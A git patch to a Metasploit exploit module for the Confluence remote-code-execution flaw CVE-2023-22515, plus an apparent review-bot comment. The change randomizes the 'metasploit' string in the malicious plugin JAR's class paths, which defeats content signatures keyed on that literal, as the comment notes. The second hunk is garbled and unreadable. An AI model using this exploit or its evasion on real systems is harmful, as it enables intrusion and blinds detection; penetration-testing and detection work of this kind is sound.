From 5e84f57ab36494f84d1845ba9168d38b064f5765 Mon Sep 17 00:00:00 2001
From: sfewer-r7
Date: Wed, 18 Oct 2023 09:53:46 +0100
Subject: [PATCH] set :random to true during generate_jar so we can randomize teh metasploit class path
---
 .../multi/http/atlassian_confluence_rce_cve_2023_22515.rb | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)
diff --git a/modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22515.rb b/modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22515.rb
index ade045ddf48e..8aa11875dae4 100644
--- a/modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22515.rb
+++ b/modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22515.rb
@@ -204,8 +204,9 @@ def exploit
 plugin_key = rand_text_alpha(8)
- # 5. Construct a malicious Servlet plugin JAR file.
- jar = payload.encoded_jar
+ # 5. Construct a malicious Servlet plugin JAR file. We set :random to true which will randomize the string
+ # 'metasploit' in the class paths (via Rex::Zip::Jar::add_sub).
+ jar = payload.encoded_jar(random: true)
 jar.add_file( 'atlassian-plugin.xml',
@@ -215,7 +216,7 @@ def exploit
 #{rand_text_alphanumeric(8)} #{rand(1024)}.#{rand(1024)} - + #{normalize_uri(payload_endpoint)} )
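Review bot: The new step 5 comment in the first hunk cites the helper as `Rex::Zip::Jar::add_sub`, but `add_sub` is an instance method, so the usual Ruby notation is `Rex::Zip::Jar#add_sub`. The comment could also be tightened, for example `# 5. Construct a malicious Servlet plugin JAR file. Passing random: true replaces the literal 'metasploit'` / `# in the JAR's class paths with a random name (see Rex::Zip::Jar#add_sub).` The module's documentation should also tell detection authors that a content signature keyed on the literal 'metasploit' in JAR entry paths will no longer match plugins built by this module, so detection has to rely on other indicators. The body of `exploit` starts and ends outside both hunks, and the changed lines of the second hunk are not readable in this rendering, so this note covers the first hunk only.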